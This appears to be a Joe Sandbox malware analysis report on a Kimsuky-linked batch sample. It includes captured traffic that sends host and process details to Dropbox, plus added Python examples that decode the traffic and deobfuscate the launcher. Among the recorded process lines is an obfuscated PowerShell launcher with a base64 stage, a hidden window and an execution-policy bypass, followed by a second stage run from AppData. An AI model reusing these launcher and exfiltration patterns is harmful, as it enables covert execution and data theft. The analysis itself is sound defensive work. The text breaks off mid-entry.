    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: content.dropboxapi.com
    Content-Length: 49412
    Connection: Keep-Alive
2024-11-27 07:29:10 UTC  10000              OUT        Data Raw: ff fe 0d 00 0a 00 53 00 75 00 6e 00 64 00 61 00 79 00 2c 00 20 00 53 00 65 00 70 00 74 00 65 00 6d 00 62 00 65 00 72 00 20 00 32 00 34 00 2c 00 20 00 32 00 30 00 32 00 33 00 20 00 38 00 3a 00 30 00 30 00 3a 00 30 00 33 00 20 00 41 00 4d 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 43 00 61 00 70 00 74 00 69 00 6f 00 6e 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 20 00 20 00 20 00 42 00 75 00 69 00 6c 00 64 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 4f 00 53 00 41 00 72 00 63 00 68 00 69 00 74 00 65 00 63 00 74 00 75 00 72 00 65 00 0d 00 0a 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
    Data Ascii: Sunday, September 24, 2023 8:00:03 AMCaption Version BuildNumber OSArchitecture-------
2024-11-27 07:29:10 UTC  16355              OUT        Data Raw: 38 00 36 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 36 00 35 00 32 00 34 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 31 00 2e 00 30 00 38 00 20 00 20 00 20 00 33 00 34 00 32 00 30 00 20 00 20 00 20 00 31 00 20 00 73 00 69 00 68 00 6f 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 34 00 30 00 33 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 33 00 20 00 20 00 20 00 20 00 20 00 37 00 39 00 39 00 32 00 20 00 20 00 20 00 20
    Data Ascii: 860 26524 1.08 3420 1 sihost 403 23 7992
2024-11-27 07:29:10 UTC  3645               OUT        Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 35 00 35 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 33 00 20 00 20 00 20 00 20 00 20 00 39 00 30 00 37 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 33 00 39 00 35 00 30 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 39 00 20 00 20 00 20 00 33 00 37 00 38 00 38 00 20 00 20 00 20 00 31 00 20 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 48 00 6f 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
    Data Ascii: 552 23 9076 39500 0.09 3788 1 TextInputHost
2024-11-27 07:29:10 UTC  16355              OUT        Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 31 00 30 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 39 00 20 00 20 00 20 00 20 00 20 00 31 00 32 00 32 00 34 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 36 00 36 00 30 00 38 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 32 00 20 00 20 00 20 00 33 00 31 00 30 00 34 00 20 00 20 00 20 00 31 00 20 00 54 00 6f 00 54 00 70 00 41 00 65 00 4c 00 59 00 51 00 46 00 47 00 44 00 69 00 6f 00 69 00 48 00 62 00 66 00 43 00 73 00 66 00 69 00 70 00 49 00 43 00 74 00 46 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                            Data Ascii: 106 9 1224 6608 0.02 3104 1 ToTpAeLYQFGDioiHbfCsfipICtF
                                                                                                                            2024-11-27 07:29:10 UTC3057OUTData Raw: 00 37 00 30 00 35 00 36 00 20 00 20 00 20 00 31 00 20 00 54 00 6f 00 54 00 70 00 41 00 65 00 4c 00 59 00 51 00 46 00 47 00 44 00 69 00 6f 00 69 00 48 00 62 00 66 00 43 00 73 00 66 00 69 00 70 00 49 00 43 00 74 00 46 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 31 00 30 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 39 00 20 00 20 00 20 00 20 00 20 00 31 00 32 00 32 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 36 00 35 00 39 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 32 00 20 00 20 00 20 00 37 00 30 00 38 00 30 00 20 00 20 00
                                                                                                                            Data Ascii: 7056 1 ToTpAeLYQFGDioiHbfCsfipICtF 106 9 1220 6592 0.02 7080
                                                                                                                            2024-11-27 07:29:12 UTC469INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json
                                                                                                                            Cache-Control: no-cache
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Server-Response-Time: 1039
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:12 GMT
                                                                                                                            Server: envoy
                                                                                                                            Content-Length: 487
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: 1efc2f16f2864fc69a1e265559722e08
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:12 UTC487INData Raw: 7b 22 6e 61 6d 65 22 3a 20 22 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 52 52 52 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 6c 6f 77 65 72 22 3a 20 22 2f 67 69 74 68 75 62 2f 73 61 6e 74 61 32 5f 66 69 72 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 72 72 72 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 2f 67 69 74 68 75 62 2f 73 61 6e 74 61 32 5f 66 69 72 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 52 52 52 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 69 64 22 3a 20 22 69 64 3a 77 54 5f 45 46 74 4e 6c 6f 4a 45 41 41 41 41 41 41 41 41 58 79 51 22 2c 20 22 63 6c 69 65 6e 74 5f 6d 6f 64 69 66 69 65 64 22 3a 20
                                                                                                                            Data Ascii: {"name": "192.168.2.4-1127_0234-RRR-santa2.txt", "path_lower": "/github/santa2_first/192.168.2.4-1127_0234-rrr-santa2.txt", "path_display": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "id": "id:wT_EFtNloJEAAAAAAAAXyQ", "client_modified":
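What these OUT segments carry is the host data being sent away: the 10000-byte segment starts with a UTF-16LE byte-order mark (ff fe), then a date line, then a table of Win32_OperatingSystem properties (Caption, Version, BuildNumber, OSArchitecture), and the later segments are a process table laid out like Get-Process output. The Dropbox reply is API file metadata for the stored file, whose name is built from the local IP address. The report's "Data Ascii" column only strips the NUL bytes, and the 16355- and 3645-byte segments start one byte into a UTF-16 code unit, so decoding them byte-for-byte produces noise. The Python below is an added example, not part of the Joe Sandbox report: it decodes a "Data Raw" dump with the BOM honoured, recovers the alignment of a BOM-less fragment, and reassembles segments before decoding. The hex literals are copied from the dumps above (truncated); the split point used to exercise reassembly is constructed.

```python
import re

# Constructed sample input: the first bytes of the 10000-byte OUT segment,
# copied from the report's Data Raw line (BOM ff fe, then UTF-16LE text).
SAMPLE_RAW = (
    "ff fe 0d 00 0a 00 53 00 75 00 6e 00 64 00 61 00 79 00 2c 00 20 00 "
    "53 00 65 00 70 00 74 00 65 00 6d 00 62 00 65 00 72 00 20 00 32 00 "
    "34 00 2c 00 20 00 32 00 30 00 32 00 33 00 20 00 38 00 3a 00 30 00 "
    "30 00 3a 00 30 00 33 00 20 00 41 00 4d 00 0d 00 0a 00 0d 00 0a 00 "
    "0d 00 0a 00 0d 00 0a 00 43 00 61 00 70 00 74 00 69 00 6f 00 6e 00"
)

# Constructed sample of a later TCP segment that begins one byte into a
# UTF-16 code unit, as the report's 3645-byte segment does ("00 20 00 20 ...").
MISALIGNED_RAW = (
    "00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 "
    "35 00 35 00 32 00 20 00"
)

PRINTABLE = set("\r\n\t") | {chr(c) for c in range(0x20, 0x7F)}


def hexdump_to_bytes(text: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex dump (any spacing) into bytes."""
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", text))


def _text_score(text: str) -> float:
    """Fraction of characters that are printable ASCII or line/tab controls."""
    return sum(ch in PRINTABLE for ch in text) / len(text) if text else 0.0


def decode_utf16le_fragment(raw: bytes) -> str:
    """Decode a BOM-less UTF-16LE fragment whose first byte may be half a code unit.

    Both alignments are tried and the one yielding more printable ASCII wins;
    the wrong alignment turns English text into CJK-looking noise.
    """
    best = None
    for offset in (0, 1):
        body = raw[offset:]
        body = body[: len(body) - len(body) % 2]  # drop a dangling half unit
        text = body.decode("utf-16-le", errors="replace")
        cand = (_text_score(text), -offset, text)  # on a tie keep offset 0
        if best is None or cand > best:
            best = cand
    return best[2]


def decode_stream(raw: bytes) -> str:
    """Decode one captured segment: honour a BOM, else pick UTF-16LE or UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    # UTF-16 English text is about half NUL bytes; UTF-8 text has none.
    if raw and raw.count(0) / len(raw) > 0.25:
        return decode_utf16le_fragment(raw)
    return raw.decode("utf-8", errors="replace")


def reassemble(hex_chunks) -> bytes:
    """Join the Data Raw dumps of one direction of a stream, in order, so that
    segment boundaries cannot split code units before decoding."""
    return b"".join(hexdump_to_bytes(chunk) for chunk in hex_chunks)


def split_lines(text: str) -> list:
    """Lines of the decoded upload with trailing column padding removed."""
    return [line.rstrip() for line in text.replace("\r\n", "\n").split("\n")]


if __name__ == "__main__":
    for line in split_lines(decode_stream(hexdump_to_bytes(SAMPLE_RAW))):
        print(repr(line))
    print(repr(decode_stream(hexdump_to_bytes(MISALIGNED_RAW))))
```

When all OUT dumps of a stream are available, feed them to reassemble() in capture order and decode once; the alignment heuristic is only for the case where a single segment is all you have.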



                                                                                                                            Target ID:0
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                                                                                                                            Imagebase:0x7ff693530000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:02:29:02
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:02:29:02
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true
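The command line of Target ID 2 is the launcher that the Sigma hits (Base64 Encoded PowerShell Command, Invoke-Obfuscation VAR++ LAUNCHER, FromBase64String, Suspicious PowerShell Parameter Substring) fire on. The payload is a base64 literal decoded as UTF-8, and the cmdlet that runs it is never spelled out: `'{5}{0}{2}{1}{3}{4}{6}' -f 'oke','xp','-E','res','sio','Inv','n'` assembles Invoke-Expression at run time. `/W 1` is -WindowStyle with the numeric value of ProcessWindowStyle.Hidden, duplicated by `-w hidden`, and `-ep bypass` disables the execution policy. Target ID 3 then runs %AppData%\chrome.ps1 with the same policy bypass, hidden window, -NoProfile and -NonInteractive. The Python below is an added example and not part of the report: it resolves the -f format operator, decodes FromBase64String literals and lists the launcher switches. The base64 payload on the page is redacted, so STAGE2 is a constructed stand-in; the indicator names are this example's own labels, not Sigma rule titles.

```python
import base64
import re

# Constructed stand-in for the redacted base64 payload. The page only shows
# that the next stage (Target ID 3) runs %AppData%\chrome.ps1.
STAGE2 = "$abc = Join-Path ($env:AppData) 'chrome.ps1'; & $abc"

# Launcher shape recorded for Target ID 2, with STAGE2 in place of the
# redacted literal.
TARGET2_CMDLINE = (
    "powershell /W 1 -ep bypass -w hidden -command "
    "$cmkGnaBV=[Convert]::FromBase64String('"
    + base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")
    + "');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);"
    "&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD"
)

# Command line recorded for Target ID 3, as shown in the report.
TARGET3_CMDLINE = (
    'PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile '
    '-ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) '
    '\\"chrome.ps1\\"; & $abc;}"'
)

# ('{5}{0}...' -f 'a','b',...): a single-quoted format string and its arguments.
FORMAT_OP = re.compile(
    r"\(\s*'((?:[^']|'')*)'\s*-f\s*((?:'(?:[^']|'')*'\s*,?\s*)+)\)", re.IGNORECASE
)
ARG = re.compile(r"'((?:[^']|'')*)'")
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)

INDICATORS = {
    "execution policy bypass": re.compile(r"[-/](?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "hidden window": re.compile(r"(?:[-/](?:w|win|windowstyle)\s+hidden|/W\s+1\b)", re.I),
    "no profile": re.compile(r"[-/](?:nop|noprofile)\b", re.I),
    "non-interactive": re.compile(r"[-/]noni(?:nteractive)?\b", re.I),
    "base64 payload": re.compile(r"FromBase64String", re.I),
    "format-string obfuscation": FORMAT_OP,
    "invoke-expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
}


def resolve_format_strings(cmdline: str) -> str:
    """Replace each ('{i}{j}..' -f 'x','y',..) with the string it builds.

    Only the plain {n} placeholder form seen here is handled; PowerShell also
    accepts alignment and format specifiers ({0,10}, {1:X}), which are left as is.
    """
    def build(match):
        fmt = match.group(1).replace("''", "'")
        args = [a.replace("''", "'") for a in ARG.findall(match.group(2))]
        try:
            return "'" + fmt.format(*args) + "'"
        except (IndexError, KeyError, ValueError):
            return match.group(0)
    return FORMAT_OP.sub(build, cmdline)


def decode_base64_literals(cmdline: str) -> list:
    """Decode every FromBase64String('...') literal; NUL bytes mean the payload
    is UTF-16LE (the -EncodedCommand convention), otherwise UTF-8 as here."""
    decoded = []
    for literal in B64_LITERAL.findall(cmdline):
        raw = base64.b64decode(literal)
        codec = "utf-16-le" if b"\x00" in raw else "utf-8"
        decoded.append(raw.decode(codec, errors="replace"))
    return decoded


def triage(cmdline: str) -> dict:
    """Deobfuscate one PowerShell command line and list the indicators it carries."""
    resolved = resolve_format_strings(cmdline)
    hits = sorted(
        name for name, rx in INDICATORS.items()
        if rx.search(cmdline) or rx.search(resolved)
    )
    return {"resolved": resolved, "decoded": decode_base64_literals(resolved), "indicators": hits}


if __name__ == "__main__":
    for cmd in (TARGET2_CMDLINE, TARGET3_CMDLINE):
        result = triage(cmd)
        print(result["indicators"])
        print(result["resolved"])
        for stage in result["decoded"]:
            print("  decoded:", stage)
```

Run the decoded stage through triage() again: staged launchers nest, and the second layer often carries its own base64 literal or format-operator trick.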


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
Execution graph nodes (id: address): 14486: 7ffd9b7a6984; 14487: 7ffd9b7a698d (LoadLibraryExW); 14489: 7ffd9b7a6a3d. Edges: 14486 -> 14487 -> 14489.

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              • Opcode ID: 9912798fe078a0b3c5a821291fa01222f68a958a786cda81020249f3175d37cc
                                                                                                                              • Instruction ID: bdf88350d5e00f8c0ae2c6ca798a328210baf43469f6bc0e5f726ef7d665815c
                                                                                                                              • Opcode Fuzzy Hash: 9912798fe078a0b3c5a821291fa01222f68a958a786cda81020249f3175d37cc
                                                                                                                              • Instruction Fuzzy Hash: F531E43190CA4C8FDB59DB988849BE9BBE1FF55320F04826FD009C32A2DB74A805CB91

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: aed2adef6ad24a69dec6ff0c1f73a73f4ee8080e50810110294f2f089592c69a
                                                                                                                              • Instruction ID: 7e2e5311e4c57b054a4048da72d89a1bb3b770e7015db5cd8a8510543c6cefdf
                                                                                                                              • Opcode Fuzzy Hash: aed2adef6ad24a69dec6ff0c1f73a73f4ee8080e50810110294f2f089592c69a
                                                                                                                              • Instruction Fuzzy Hash: 0A514932B0EA8F8FE7A9C75C54256B477D2EF89610B9900BED05EC72E7DE14E8058341

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 96a0cdf8908b20f618e5b672a52f56da529dbcc962044f196cba62354dc81576
                                                                                                                              • Instruction ID: ac1a1b55445cd54c31aa4b0a683cbc11ebcc06e46d9fbff7da61b608b5b2bb3f
                                                                                                                              • Opcode Fuzzy Hash: 96a0cdf8908b20f618e5b672a52f56da529dbcc962044f196cba62354dc81576
                                                                                                                              • Instruction Fuzzy Hash: 62412832B0EA4D8FE7A5D768542D9F877D2EF49320B9901BAD05EC71A7E918ED008741

                                                                                                                              Control-flow Graph

Control-flow graph basic blocks (id: address range): 142: 7ffd9b67e540-7ffd9b67e579; 145: 7ffd9b67e57b-7ffd9b67e585; 146: 7ffd9b67e58a-7ffd9b67e58c; 147: 7ffd9b67e58d-7ffd9b67e5fb; 148: 7ffd9b67e587; 150: 7ffd9b67e5fd-7ffd9b67e604; 151: 7ffd9b67e62b-7ffd9b67e640; 152: 7ffd9b67e606-7ffd9b67e61f; 153: 7ffd9b67e623-7ffd9b67e629.
Edges: 142 -> 145, 142 -> 146, 145 -> 147, 145 -> 148, 146 -> 147, 147 -> 150, 148 -> 146, 150 -> 151, 150 -> 152, 152 -> 153, 153 -> 150.
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854112156.00007FFD9B67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B67D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b67d000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f275910dee69082e209d0b529d742d0a8bb40b8b5e951af4a9bab7d14e3c5509
                                                                                                                              • Instruction ID: c0e294a4ed5e0ba282214c5bb5d7dd19a9f52d66c04b1bbc2559703236dbf8df
                                                                                                                              • Opcode Fuzzy Hash: f275910dee69082e209d0b529d742d0a8bb40b8b5e951af4a9bab7d14e3c5509
                                                                                                                              • Instruction Fuzzy Hash: FE41193140EBC84FE7568B3998919523FF4EF56320B1A05DFD0C8CF1A7D629A84AC792

Control-flow Graph

Memory Dump Source
• Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb49b5f0b8519a3a64c653d0428669d3fdb318548f0c5a699f009ac701af2307
• Instruction ID: 9ae857f6a9c3b16d72dedb1e7df4f326646b9949d4b8ec2f183df266e94b3091
• Opcode Fuzzy Hash: fb49b5f0b8519a3a64c653d0428669d3fdb318548f0c5a699f009ac701af2307
• Instruction Fuzzy Hash: 9A21C822F0FA8F8FE7B5C75854796B467C2EF59610B9A00BAD05EC76B2DE14ED058301

Control-flow Graph

Memory Dump Source
• Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cac58d7af4d7caa0a181a6a76f6208d563ec7ade1ec20e2a720527352cc6cc9
• Instruction ID: 3c8852e6e4045d8c9c7309b0a4f05550d607899685889f5148b9861e2bd8313a
• Opcode Fuzzy Hash: 3cac58d7af4d7caa0a181a6a76f6208d563ec7ade1ec20e2a720527352cc6cc9
• Instruction Fuzzy Hash: 0A11A332A0E65D8FE7B5D758946C9BC77D2FF4832079A01FAE05DCB1A6DA18ED008741

Memory Dump Source
• Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4b0e00247f810d48c36f98906eaa41557913cdd04d30d7d11a6357c335310635
• Instruction ID: 7b73a8a7b83ecc6009e45965193ef87f9fe5133acdac730fe7783a943c2ed27b
• Opcode Fuzzy Hash: 4b0e00247f810d48c36f98906eaa41557913cdd04d30d7d11a6357c335310635
• Instruction Fuzzy Hash: 8BF0A73131CF044FD744EE1DD445661B7E0FBA8350F10462FE449C3651DA21E4818782
Strings

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID: #D
• API String ID: 0-2218572824
• Opcode ID: cde4f25d9821c683c38d75908c771526df7ca8a850562ec67bcea9a040fc115c
• Instruction ID: 2d137ef19b746d812e972bba0a304073937bd2e6361812cc8d41b755d4f08421
• Opcode Fuzzy Hash: cde4f25d9821c683c38d75908c771526df7ca8a850562ec67bcea9a040fc115c
• Instruction Fuzzy Hash: 23E1562BB4D9661DE32972BDB5618FC6B11DF91338B0847B7F29D8D0D78E08208686E5

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
